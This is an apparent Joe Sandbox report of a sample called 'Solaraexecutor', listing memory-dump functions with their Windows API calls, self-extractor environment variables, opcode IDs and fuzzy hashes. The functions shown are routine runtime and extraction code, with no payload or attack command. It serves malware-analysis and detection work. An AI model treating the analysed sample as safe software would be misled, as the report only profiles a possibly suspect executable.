GetLastError.KERNEL32(?,?,00D27760,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00D2996C
CreateFileW.KERNEL32(00000000,?,?,00000000,00000003,08000000,00000000,?,?,00000800,?,?,00D27760,?,00000005,?), ref: 00D299A2
GetLastError.KERNEL32(?,?,00D27760,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00D299AA
SetFileTime.KERNEL32(00000000,00000000,000000FF,00000000,?,00D27760,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00D299F9

Memory Dump Source

Source File: 00000003.00000002.1710873663.0000000000D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 00D20000, based on PE: true

Associated: 00000003.00000002.1710854804.0000000000D20000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710901398.0000000000D53000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D5E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D65000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D82000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710987869.0000000000D83000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d20000_Solaraexecutor.jbxd

Similarity

API ID: File$CreateErrorLast$Time
String ID:
API String ID: 1999340476-0
Opcode ID: 9c2b93cadf7ebc2736f02a5771aae8753706addf5d05bf359b396c1f41f00f6e
Instruction ID: 42fe9821a4b0b381286684bc697ecb24dc15c74856dd696b9c8291853b15b81d
Opcode Fuzzy Hash: 9c2b93cadf7ebc2736f02a5771aae8753706addf5d05bf359b396c1f41f00f6e
Instruction Fuzzy Hash: 163123305443516FE7209F24EC46B9AFB94BB24338F141B1DF9A1922C0D3A5A994CFB0

Function 00D3B568 Relevance: 7.5, APIs: 5, Instructions: 38
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00D3B579
GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00D3B58A
IsDialogMessageW.USER32(00010424,?), ref: 00D3B59E
TranslateMessage.USER32(?), ref: 00D3B5AC
DispatchMessageW.USER32(?), ref: 00D3B5B6

Memory Dump Source

Source File: 00000003.00000002.1710873663.0000000000D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 00D20000, based on PE: true

Associated: 00000003.00000002.1710854804.0000000000D20000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710901398.0000000000D53000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D5E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D65000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D82000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710987869.0000000000D83000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d20000_Solaraexecutor.jbxd

Similarity

API ID: Message$DialogDispatchPeekTranslate
String ID:
API String ID: 1266772231-0
Opcode ID: 32d6d644d0a8e46462f79abfef3aa8e22dcfb54cf6f1de5eecc5b4742fc075ad
Instruction ID: f557dbe3d442d51e0c47c7b24a7d7f4b32b3cf56c8e8fd6d9a9c4fe2c7c80c88
Opcode Fuzzy Hash: 32d6d644d0a8e46462f79abfef3aa8e22dcfb54cf6f1de5eecc5b4742fc075ad
Instruction Fuzzy Hash: B7F0B771A1122AABCB20AFE6EC4CDDB7FACEE05AA17044515B909D2150EB74E605CBB0

Function 00D3ABAB Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 35
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetClassNameW.USER32(?,?,00000050), ref: 00D3ABC2
SHAutoComplete.SHLWAPI(?,00000010), ref: 00D3ABF9

Part of subcall function 00D31FBB: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00011FBB,00D2C116,00000000,.exe,?,?,00000800,?,?,?,00D38E3C), ref: 00D31FD1

FindWindowExW.USER32(?,00000000,EDIT,00000000), ref: 00D3ABE9

Strings

EDIT, xrefs: 00D3ABCD, 00D3ABD8, 00D3ABE5

Memory Dump Source

Source File: 00000003.00000002.1710873663.0000000000D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 00D20000, based on PE: true

Associated: 00000003.00000002.1710854804.0000000000D20000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710901398.0000000000D53000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D5E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D65000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D82000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710987869.0000000000D83000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d20000_Solaraexecutor.jbxd

Similarity

API ID: AutoClassCompareCompleteFindNameStringWindow
String ID: EDIT
API String ID: 4243998846-3080729518
Opcode ID: 1c6705e48ee7133f3f7970eec769f91914280ce58515829cd51ae9a1b107955b
Instruction ID: 70ff227f2a35e615114270cf9560d4546bb16c9798128c1e833b2dff3148550f
Opcode Fuzzy Hash: 1c6705e48ee7133f3f7970eec769f91914280ce58515829cd51ae9a1b107955b
Instruction Fuzzy Hash: 77F0823370032976DB205A289C09F9BB76C9F46F40F484011BE45E2280D760DA4587B6

Function 00D3DBDE Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 31
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetEnvironmentVariableW.KERNELBASE(sfxcmd,?), ref: 00D3DBF4
SetEnvironmentVariableW.KERNEL32(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 00D3DC30

Strings

sfxpar, xrefs: 00D3DC2B
sfxcmd, xrefs: 00D3DBEF

Memory Dump Source

Source File: 00000003.00000002.1710873663.0000000000D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 00D20000, based on PE: true

Associated: 00000003.00000002.1710854804.0000000000D20000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710901398.0000000000D53000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D5E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D65000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D82000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710987869.0000000000D83000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d20000_Solaraexecutor.jbxd

Similarity

API ID: EnvironmentVariable
String ID: sfxcmd$sfxpar
API String ID: 1431749950-3493335439
Opcode ID: eaceedb403a814707f6900aaa69c9c0669183a7574f6cc3748f237ce1f361699
Instruction ID: 4bd8285b63d37c72bf10036b8280c7a2054049fe104948f0be1091f5674d4cd7
Opcode Fuzzy Hash: eaceedb403a814707f6900aaa69c9c0669183a7574f6cc3748f237ce1f361699
Instruction Fuzzy Hash: 7DF0E5B2414724ABCF212FA5AC06FFA3F59EF08BC2F080411FD85D6195E6B0C944DAB0

Function 00D29785 Relevance: 6.1, APIs: 4, Instructions: 56
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetStdHandle.KERNEL32(000000F6), ref: 00D29795
ReadFile.KERNELBASE(?,?,?,?,00000000), ref: 00D297AD
GetLastError.KERNEL32 ref: 00D297DF
GetLastError.KERNEL32 ref: 00D297FE

Memory Dump Source

Source File: 00000003.00000002.1710873663.0000000000D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 00D20000, based on PE: true

Associated: 00000003.00000002.1710854804.0000000000D20000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710901398.0000000000D53000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D5E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D65000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D82000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710987869.0000000000D83000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d20000_Solaraexecutor.jbxd

Similarity

API ID: ErrorLast$FileHandleRead
String ID:
API String ID: 2244327787-0
Opcode ID: 2e9153bcfe05bcbbd7feba5e88c7fe2feb6ed26c3a251c1987f05aed36ef8706
Instruction ID: 3321c758b029292f1c65896c3d8638e68bdc498d1f992d61d51acd3e333b67cb
Opcode Fuzzy Hash: 2e9153bcfe05bcbbd7feba5e88c7fe2feb6ed26c3a251c1987f05aed36ef8706
Instruction Fuzzy Hash: E8110830910324EBDF205F24EC1466AF7A9FF62369F188529F866C6290D770CE44DB71

Function 00D4AD34 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00D43F73,00000000,00000000,?,00D4ACDB,00D43F73,00000000,00000000,00000000,?,00D4AED8,00000006,FlsSetValue), ref: 00D4AD66
GetLastError.KERNEL32(?,00D4ACDB,00D43F73,00000000,00000000,00000000,?,00D4AED8,00000006,FlsSetValue,00D57970,FlsSetValue,00000000,00000364,?,00D498B7), ref: 00D4AD72
LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,00D4ACDB,00D43F73,00000000,00000000,00000000,?,00D4AED8,00000006,FlsSetValue,00D57970,FlsSetValue,00000000), ref: 00D4AD80

Memory Dump Source

Source File: 00000003.00000002.1710873663.0000000000D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 00D20000, based on PE: true

Associated: 00000003.00000002.1710854804.0000000000D20000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710901398.0000000000D53000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D5E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D65000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D82000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710987869.0000000000D83000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d20000_Solaraexecutor.jbxd

Similarity

API ID: LibraryLoad$ErrorLast
String ID:
API String ID: 3177248105-0
Opcode ID: e4ea9e789402ce15dd6773caca185e4b72c35f3dc355adf11a7fd0a32c6263f7
Instruction ID: cab98e33b93601e0158da158ed0975ba6d5b6cecebaead5bb98c73408390af8a
Opcode Fuzzy Hash: e4ea9e789402ce15dd6773caca185e4b72c35f3dc355adf11a7fd0a32c6263f7
Instruction Fuzzy Hash: 5D01F736A91322ABC7224E6C9C44A577B58EF457B3B290624FD56D7690E720D80186F1

Function 00D29F7A Relevance: 4.6, APIs: 3, Instructions: 111fileCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(000000F5,?,?,?,?,00D2D343,00000001,?,?,?,00000000,00D3551D,?,?,?), ref: 00D29F9E
WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,00000000,00D3551D,?,?,?,?,?,00D34FC7,?), ref: 00D29FE5
WriteFile.KERNELBASE(0000001D,?,?,?,00000000,?,00000001,?,?,?,?,00D2D343,00000001,?,?), ref: 00D2A011

Memory Dump Source

Source File: 00000003.00000002.1710873663.0000000000D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 00D20000, based on PE: true

Associated: 00000003.00000002.1710854804.0000000000D20000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710901398.0000000000D53000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D5E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D65000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D82000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710987869.0000000000D83000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d20000_Solaraexecutor.jbxd

Similarity

API ID: FileWrite$Handle
String ID:
API String ID: 4209713984-0
Opcode ID: 7ef12e4726f785d41a6ee12c4a8b0cefb5345f14bcba32a0e6b03433cc4eef08
Instruction ID: 6d4cd3c7a3245854a65dc94141806a6c5a063f4b93af071444ea82f06b751966
Opcode Fuzzy Hash: 7ef12e4726f785d41a6ee12c4a8b0cefb5345f14bcba32a0e6b03433cc4eef08
Instruction Fuzzy Hash: BC31E431208325AFDB14CF28E918B6EB7A5FFA4719F04491DF98197290C775AD48CBB2

Function 00D2A2B2 Relevance: 4.6, APIs: 3, Instructions: 55COMMON

Download Yara Rule

APIs

Part of subcall function 00D2C27E: _wcslen.LIBCMT ref: 00D2C284

CreateDirectoryW.KERNELBASE(?,00000000,?,?,?,00D2A175,?,00000001,00000000,?,?), ref: 00D2A2D9
CreateDirectoryW.KERNEL32(?,00000000,?,?,00000800,?,?,?,?,00D2A175,?,00000001,00000000,?,?), ref: 00D2A30C
GetLastError.KERNEL32(?,?,?,?,00D2A175,?,00000001,00000000,?,?), ref: 00D2A329

Memory Dump Source

Source File: 00000003.00000002.1710873663.0000000000D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 00D20000, based on PE: true

Associated: 00000003.00000002.1710854804.0000000000D20000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710901398.0000000000D53000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D5E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D65000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D82000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710987869.0000000000D83000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d20000_Solaraexecutor.jbxd

Similarity

API ID: CreateDirectory$ErrorLast_wcslen
String ID:
API String ID: 2260680371-0
Opcode ID: 28b855c997e091474f8f657a57a451e5cc4adec26a5bad218e76293cea1f051e
Instruction ID: 4ac923d6e4607f8ea3a9e3a6ef32e0203978adcc7f9cb4bd8b04447f57327b0a
Opcode Fuzzy Hash: 28b855c997e091474f8f657a57a451e5cc4adec26a5bad218e76293cea1f051e
Instruction Fuzzy Hash: 0001B131200330ABEF21EBBD6C09BEE3348DF2A789F084455F941E61C1DB64DE8186B6

Function 00D4B893 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 132COMMON

Download Yara Rule

APIs

GetCPInfo.KERNEL32(5EFC4D8B,?,00000005,?,00000000), ref: 00D4B8B8

Strings

, xrefs: 00D4B8FD

Memory Dump Source

Source File: 00000003.00000002.1710873663.0000000000D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 00D20000, based on PE: true

Associated: 00000003.00000002.1710854804.0000000000D20000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710901398.0000000000D53000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D5E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D65000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D82000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710987869.0000000000D83000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d20000_Solaraexecutor.jbxd

Similarity

API ID: Info
String ID:
API String ID: 1807457897-3916222277
Opcode ID: 8effc6d7ffdfa8135f33289664fa0da4eaf5e18e1d9edb8e8d135c1e20e744a5
Instruction ID: 4203aed9ab84727d8e4b65b44059429b5c195810166f055e9c0b36bba6c8ca0c
Opcode Fuzzy Hash: 8effc6d7ffdfa8135f33289664fa0da4eaf5e18e1d9edb8e8d135c1e20e744a5
Instruction Fuzzy Hash: 3B41F67050438C9BDF218E288C84BF6BBE9EB65314F1804EEE6DA86142D375EA459F70

Function 00D4AF6C Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 47COMMONLIBRARYCODE

Download Yara Rule

APIs

LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,2DE85006,00000001,?,?), ref: 00D4AFDD

Strings

LCMapStringEx, xrefs: 00D4AF7D, 00D4AF87

Memory Dump Source

Source File: 00000003.00000002.1710873663.0000000000D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 00D20000, based on PE: true

Associated: 00000003.00000002.1710854804.0000000000D20000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710901398.0000000000D53000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D5E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D65000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D82000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710987869.0000000000D83000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d20000_Solaraexecutor.jbxd

Similarity

API ID: String
String ID: LCMapStringEx
API String ID: 2568140703-3893581201
Opcode ID: 4c4ffb0ed18a012e8448f1f4199a62675c06b89c803d3d4b37b756fa0da128d2
Instruction ID: 19a624053efec41c54cafe6d7229f995aadd95054db9f038077a94543f824298
Opcode Fuzzy Hash: 4c4ffb0ed18a012e8448f1f4199a62675c06b89c803d3d4b37b756fa0da128d2
Instruction Fuzzy Hash: 1B012232644209BBCF02AF94EC02DEE7F66EF08751F054154FE1866260CB328A35AFA1

Function 00D4AF0A Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 34COMMON

Download Yara Rule

APIs

InitializeCriticalSectionAndSpinCount.KERNEL32(?,?,00D4A56F), ref: 00D4AF55

Strings

InitializeCriticalSectionEx, xrefs: 00D4AF1B, 00D4AF25

Memory Dump Source

Source File: 00000003.00000002.1710873663.0000000000D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 00D20000, based on PE: true

Associated: 00000003.00000002.1710854804.0000000000D20000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710901398.0000000000D53000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D5E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D65000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D82000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710987869.0000000000D83000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d20000_Solaraexecutor.jbxd

Similarity

API ID: CountCriticalInitializeSectionSpin
String ID: InitializeCriticalSectionEx
API String ID: 2593887523-3084827643
Opcode ID: 33dd2ba9fa4854867f5a44840a7a1be68982924a5ac5441c913fa12ee8ddc359
Instruction ID: 18886016da4646cca715c39a93edd07e1d6ed9240924d81e93da8cdfbad5487c
Opcode Fuzzy Hash: 33dd2ba9fa4854867f5a44840a7a1be68982924a5ac5441c913fa12ee8ddc359
Instruction Fuzzy Hash: 93F0B431A85308BFCF025F54DC02C9EBF61EF04752B004054FC0896260DA715E14DFB5

Function 00D4ADAF Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 30memoryCOMMON

Download Yara Rule

APIs

TlsAlloc.KERNEL32 ref: 00D4ADEE

Strings

FlsAlloc, xrefs: 00D4ADC0, 00D4ADCA

Memory Dump Source

Source File: 00000003.00000002.1710873663.0000000000D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 00D20000, based on PE: true

Associated: 00000003.00000002.1710854804.0000000000D20000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710901398.0000000000D53000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D5E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D65000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D82000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710987869.0000000000D83000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d20000_Solaraexecutor.jbxd

Similarity

API ID: Alloc
String ID: FlsAlloc
API String ID: 2773662609-671089009
Opcode ID: 49f2c6f0c6b8d471b8c89918463c8db5eea77c4bb89462a97d5ecbd1314937fd
Instruction ID: 4f915f59640ef986be84cff4e4e8728d51960e9e4f94ab68dc9801f3e7447b26
Opcode Fuzzy Hash: 49f2c6f0c6b8d471b8c89918463c8db5eea77c4bb89462a97d5ecbd1314937fd
Instruction Fuzzy Hash: F6E0E531B853187BCA01AB69EC02D6EBB55DB04762B110199FC0597340DE705E448EFA

Function 00D3EAE7 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00D3EAF9

Part of subcall function 00D3E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D3E8D0
Part of subcall function 00D3E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D3E8E1

Strings

3Uo, xrefs: 00D3EAE7, 00D3EAF3

Memory Dump Source

Source File: 00000003.00000002.1710873663.0000000000D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 00D20000, based on PE: true

Associated: 00000003.00000002.1710854804.0000000000D20000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710901398.0000000000D53000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D5E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D65000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D82000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710987869.0000000000D83000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d20000_Solaraexecutor.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID: 3Uo
API String ID: 1269201914-397643623
Opcode ID: 2081f2942de1caf57a58cb109f71b8070f38f1cf96e488bb3917aa583697777f
Instruction ID: 863e0e8e3443e2bb5e30a7c18930dfa3f350867f2d4215758bacc711e1c03967
Opcode Fuzzy Hash: 2081f2942de1caf57a58cb109f71b8070f38f1cf96e488bb3917aa583697777f
Instruction Fuzzy Hash: 48B012C72AA242BC350872001D02C37430CC0C0F91730902EFC04C80D1DC804D0A0471

Function 00D4BBF0 Relevance: 3.2, APIs: 2, Instructions: 168COMMON

Download Yara Rule

APIs

Part of subcall function 00D4B7BB: GetOEMCP.KERNEL32(00000000,?,?,00D4BA44,?), ref: 00D4B7E6

IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,00D4BA89,?,00000000), ref: 00D4BC64
GetCPInfo.KERNEL32(00000000,00D4BA89,?,?,?,00D4BA89,?,00000000), ref: 00D4BC77

Memory Dump Source

Source File: 00000003.00000002.1710873663.0000000000D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 00D20000, based on PE: true

Associated: 00000003.00000002.1710854804.0000000000D20000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710901398.0000000000D53000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D5E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D65000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D82000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710987869.0000000000D83000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d20000_Solaraexecutor.jbxd

Similarity

API ID: CodeInfoPageValid
String ID:
API String ID: 546120528-0
Opcode ID: 3dc0de5d1e9b942bd17f2a2a15232e49a313b3c24afa50075ee50e684a50ed5a
Instruction ID: d607eedc1adbeeeaddda29fb2d3d3b66b8fff1712eacf32b07a9318b02b8b3ab
Opcode Fuzzy Hash: 3dc0de5d1e9b942bd17f2a2a15232e49a313b3c24afa50075ee50e684a50ed5a
Instruction Fuzzy Hash: 8E512270D003459FDB249F75C8816BABBF4EF61320F1844AFD4968B261DB35DA468BB0

Function 00D29A74 Relevance: 3.1, APIs: 2, Instructions: 116COMMON

Download Yara Rule

APIs

SetFilePointer.KERNELBASE(000000FF,?,?,?,-00000870,00000000,00000800,?,00D29A50,?,?,00000000,?,?,00D28CBC,?), ref: 00D29BAB
GetLastError.KERNEL32(?,00000000,00D28411,-00009570,00000000,000007F3), ref: 00D29BB6

Memory Dump Source

Source File: 00000003.00000002.1710873663.0000000000D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 00D20000, based on PE: true

Associated: 00000003.00000002.1710854804.0000000000D20000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710901398.0000000000D53000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D5E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D65000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D82000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710987869.0000000000D83000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d20000_Solaraexecutor.jbxd

Similarity

API ID: ErrorFileLastPointer
String ID:
API String ID: 2976181284-0
Opcode ID: fb03b6e0978f0e121d278ce1d0cf290fe2942056527beff8ed04eb2cfacc4a00
Instruction ID: 12e8bf3f938cc63a17ec149b1555c7845c1fc9cc41def78d570dd2c813925711
Opcode Fuzzy Hash: fb03b6e0978f0e121d278ce1d0cf290fe2942056527beff8ed04eb2cfacc4a00
Instruction Fuzzy Hash: E0419D319043218BDB249F29F5A446AF7E5FFF4329F188A2DE88583260D770ED458AB1

Function 00D4BA27 Relevance: 3.1, APIs: 2, Instructions: 91COMMON

Download Yara Rule

APIs

Part of subcall function 00D497E5: GetLastError.KERNEL32(?,00D61030,00D44674,00D61030,?,?,00D43F73,00000050,?,00D61030,00000200), ref: 00D497E9
Part of subcall function 00D497E5: _free.LIBCMT ref: 00D4981C
Part of subcall function 00D497E5: SetLastError.KERNEL32(00000000,?,00D61030,00000200), ref: 00D4985D
Part of subcall function 00D497E5: _abort.LIBCMT ref: 00D49863

Part of subcall function 00D4BB4E: _abort.LIBCMT ref: 00D4BB80
Part of subcall function 00D4BB4E: _free.LIBCMT ref: 00D4BBB4

Part of subcall function 00D4B7BB: GetOEMCP.KERNEL32(00000000,?,?,00D4BA44,?), ref: 00D4B7E6

_free.LIBCMT ref: 00D4BA9F
_free.LIBCMT ref: 00D4BAD5

Memory Dump Source

Source File: 00000003.00000002.1710873663.0000000000D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 00D20000, based on PE: true

Associated: 00000003.00000002.1710854804.0000000000D20000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710901398.0000000000D53000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D5E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D65000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D82000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710987869.0000000000D83000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d20000_Solaraexecutor.jbxd

Similarity

API ID: _free$ErrorLast_abort
String ID:
API String ID: 2991157371-0
Opcode ID: d3804fb7d1d3eb6c0d9d73877ac1e62baf4eb05cab537e367aa3d66acdb01c84
Instruction ID: 0f6682832767dab337e91f8961ab6f2c45898dcc57a4737b9db17e561f5c8575
Opcode Fuzzy Hash: d3804fb7d1d3eb6c0d9d73877ac1e62baf4eb05cab537e367aa3d66acdb01c84
Instruction Fuzzy Hash: 1531A431904209AFDB14EFA9D442B9DB7F5EF50330F25449AE9149B2A2EB72DE40DB70

